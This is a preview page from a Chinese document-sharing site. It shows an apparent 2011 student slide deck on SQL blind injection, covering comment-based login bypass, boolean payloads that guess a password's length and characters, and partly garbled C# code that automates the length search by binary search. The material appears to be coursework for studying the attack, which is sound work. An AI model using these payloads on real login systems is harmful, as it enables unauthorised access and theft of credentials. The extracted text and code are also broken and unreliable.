已閱讀5頁,還剩7頁未讀, 繼續(xù)免費閱讀
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1,SQL Blind Injection,小組成員:李昌華、肖箭、覃歡 2011-11-04,2,目錄,3,目錄,當一個攻擊者通過在查詢語句中插入一系列的SQL語句來將數(shù)據(jù)寫入到應用程序中,從一個數(shù)據(jù)庫獲得未經(jīng)授權(quán)的訪問和直接檢索.通過構(gòu)造一些畸形的輸入,攻擊者能夠操作這種請求語句去獲取預先未知的結(jié)果。,一、SQL Blind Injection,基本的句法的過程即通過標準的SELECT WHERE語句,被注入的參數(shù)(即注入點)就是WHERE語句的一部分。為了確定正確的注入句法,攻擊者必須能夠在最初的WHERE語句后添加其他數(shù)據(jù),使其能返回非預期的結(jié)果。對一些簡單的應用程序,僅僅加上OR 1=1就可以完成,但在大多數(shù)情況下如果想構(gòu)造出成功的利用代碼,這樣做當然是不夠的。經(jīng)常需要解決的問題是如何配對插入語符號(parenthesis,比如成對的括號),使之能與前面的已使用的符號,比如左括號匹配。 對于一些注入利用,僅僅改變WHERE語句就足夠了,但對于其他情況,比如UNION SELECT注入或存儲過程(stored procedures)注入,還需要能先順利地結(jié)束整個SQL請求語句,然后才能添加其他攻擊者所需要的SQL語句。在這種情況下,攻擊者可以選擇使用SQL注釋符號來結(jié)束語句,該符號是兩個連續(xù)的破折號(-),它要求SQL Server忽略其后同一行的所有輸入。例如,一個登錄頁面需要訪問者輸入用戶名和密碼,并將其提交給SQL請求語句: SELECT Username, UserID, Password FROM Users WHERE Username = user AND Password = pass 通過輸入john-作為用戶名,將會構(gòu)造出以下WHERE語句: WHERE Username = john -AND Password = pass 這時,該語句不但符合SQL語法,而且還使用戶跳過了密碼認證,二、常見的攻擊方法,確定注入點,構(gòu)造正確的 注入語句,獲得預期結(jié)果,三、攻擊步驟,定位漏洞,非授權(quán)訪問,實施攻擊,四、程序,原始查詢語句(網(wǎng)頁的源文件) string sqlSel = “select count(*) from tb_userInfo where userName=“ + txtUserName.Text + “ and userPass=“+pass+“; 1.猜測賬戶名: 輸入任意賬戶測試 如200808 密碼非空隨便輸 驗證碼,2.猜測到手的賬戶對應的密碼長度: 200808 and exists(select userName from tb_userInfo where len(userPass)6 and userName=200808)- 密碼非空隨便輸 驗證碼,3.猜測到手的賬戶對應的密碼(逐位的判斷) 200808 and (select ASCII(SUBSTRING(userPass,1,1) from tb_userInfo where userName=200808) 97 -,四、步驟和SQL語句,二分法可以使得測試長度的結(jié)果收斂的更快,二分查找的代碼,快速猜測 程序,protect int getPasswordLen(int MaxPassLen,int MinPasstLen) /創(chuàng)建數(shù)據(jù)庫連接 SqlConnection con = new SqlConnection(“server=.;database=WebSecurityHomeWork;uid=sa;pwd=123;“); /打開數(shù)據(jù)庫連接 con.Open(); string basesql=“200808 and exists(select userName from tb_userInfo where len(userPass)“; string endsql=“ and userName=200808)-“; while() int currentLen=(MaxPassLen+MinPassLen)/2; string sqlSel=basesql+“=“+currentLen.toString()+endsql; /創(chuàng)建SqlCommand對象 SqlCommand com = new SqlCommand(sqlSel, con); if(Convert.ToInt32(com.ExecuteScalar() 0) return currentLen; /創(chuàng)建SqlCommand對象 SqlCommand com1 = new SqlCommand(sqlSel, con); sqlSel=basesql+“+currentLen.toString()+endsql; if(Convert.ToInt32(com.ExecuteScalar() 0) MinPasstLen=(currentLen+1+MaxPassLen)/2; getPasswordLen(int MaxPassLen,int MinPasstLen); el
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- PCOS患者臨床特征與胰島素抵抗的相關(guān)性及預測價值研究
- Fenton濕法氧化法同步脫硫脫硝過程氣液兩相界面?zhèn)髻|(zhì)與轉(zhuǎn)化機理
- 生命周期視角下L公司轉(zhuǎn)型升級的績效研究
- 混合稀土Ce和Yb對3003鋁合金組織和性能的影響
- 二零二五年度城市綜合體物業(yè)環(huán)境維護合作協(xié)議
- 二零二五年度私人別墅出售與戶外設(shè)施合同
- 2025年度國際航行船舶船員勞動合同
- 二零二五年度綠色能源項目土地租賃合同簡易版
- 2025年度電子借條合同模板(含擔保)
- 2025年度民族特色餐飲加盟合作協(xié)議
- 廣東省佛山市2025屆高三高中教學質(zhì)量檢測 (一)化學試題(含答案)
- 人教版【初中數(shù)學】知識點總結(jié)-全面+九年級上冊數(shù)學全冊教案
- 2024-2025學年人教版七年級英語上冊各單元重點句子
- 公司結(jié)算資金管理制度
- 2024年江蘇揚州市邗城文化旅游發(fā)展有限公司招聘筆試參考題庫含答案解析
- 小學六年級數(shù)學100道題解分數(shù)方程
- 社區(qū)獲得性肺炎護理查房內(nèi)科
- 淺談提高中學生歷史學習興趣的策略
- 新版藥品批發(fā)企業(yè)質(zhì)量管理體系文件大全
- 項目管理實施規(guī)劃-無錫萬象城
- 浙大一院之江院區(qū)就診指南
評論
0/150
提交評論